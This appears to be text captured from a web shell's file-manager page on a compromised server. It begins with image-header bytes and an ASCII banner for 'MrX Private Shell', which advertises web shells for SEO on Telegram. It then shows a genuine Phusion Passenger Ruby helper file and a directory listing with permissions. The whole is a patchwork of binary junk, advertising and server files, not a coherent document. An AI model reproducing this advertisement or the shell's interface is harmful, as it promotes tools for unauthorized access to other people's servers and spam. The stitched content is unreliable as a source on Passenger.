����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# Phusion Passenger - https://www.phusionpassenger.com/
# Copyright (c) 2010-2025 Asynchronous B.V.
#
# "Passenger", "Phusion Passenger" and "Union Station" are registered
# trademarks of Asynchronous B.V.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
module PhusionPassenger
module AdminTools
def self.tmpdir
["PASSENGER_INSTANCE_REGISTRY_DIR", "TMPDIR"].each do |name|
if ENV.has_key?(name) && !ENV[name].empty?
return ENV[name]
end
end
return Dir['/tmp/systemd-private-*-{httpd,nginx}.service-*/tmp'].first || "/tmp"
end
def self.process_is_alive?(pid)
begin
Process.kill(0, pid)
return true
rescue Errno::ESRCH
return false
rescue SystemCallError => e
return true
end
end
end # module AdminTools
end # module PhusionPassenger
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| admin_tools | Folder | 0755 |
|
|
| apache2 | Folder | 0755 |
|
|
| config | Folder | 0755 |
|
|
| nginx | Folder | 0755 |
|
|
| platform_info | Folder | 0755 |
|
|
| rack | Folder | 0755 |
|
|
| request_handler | Folder | 0755 |
|
|
| standalone | Folder | 0755 |
|
|
| utils | Folder | 0755 |
|
|
| vendor | Folder | 0755 |
|
|
| abstract_installer.rb | File | 13.22 KB | 0644 |
|
| admin_tools.rb | File | 1.86 KB | 0644 |
|
| admin_tools.rb.tmpdir | File | 1.84 KB | 0644 |
|
| common_library.rb | File | 12.21 KB | 0644 |
|
| console_text_template.rb | File | 2.29 KB | 0644 |
|
| constants.rb | File | 6.01 KB | 0644 |
|
| debug_logging.rb | File | 3.84 KB | 0644 |
|
| loader_shared_helpers.rb | File | 37.72 KB | 0644 |
|
| locations.ini | File | 562 B | 0644 |
|
| message_channel.rb | File | 10.6 KB | 0644 |
|
| message_client.rb | File | 3.86 KB | 0644 |
|
| native_support.rb | File | 15.96 KB | 0644 |
|
| packaging.rb | File | 4.01 KB | 0644 |
|
| platform_info.rb | File | 16.71 KB | 0644 |
|
| plugin.rb | File | 2.92 KB | 0644 |
|
| preloader_shared_helpers.rb | File | 6.25 KB | 0644 |
|
| public_api.rb | File | 2.81 KB | 0644 |
|
| rack_handler.rb | File | 2.55 KB | 0644 |
|
| request_handler.rb | File | 21.4 KB | 0644 |
|
| ruby_core_enhancements.rb | File | 5.5 KB | 0644 |
|
| ruby_core_io_enhancements.rb | File | 3.53 KB | 0644 |
|
| simple_benchmarking.rb | File | 1.9 KB | 0644 |
|
| utils.rb | File | 7.6 KB | 0644 |
|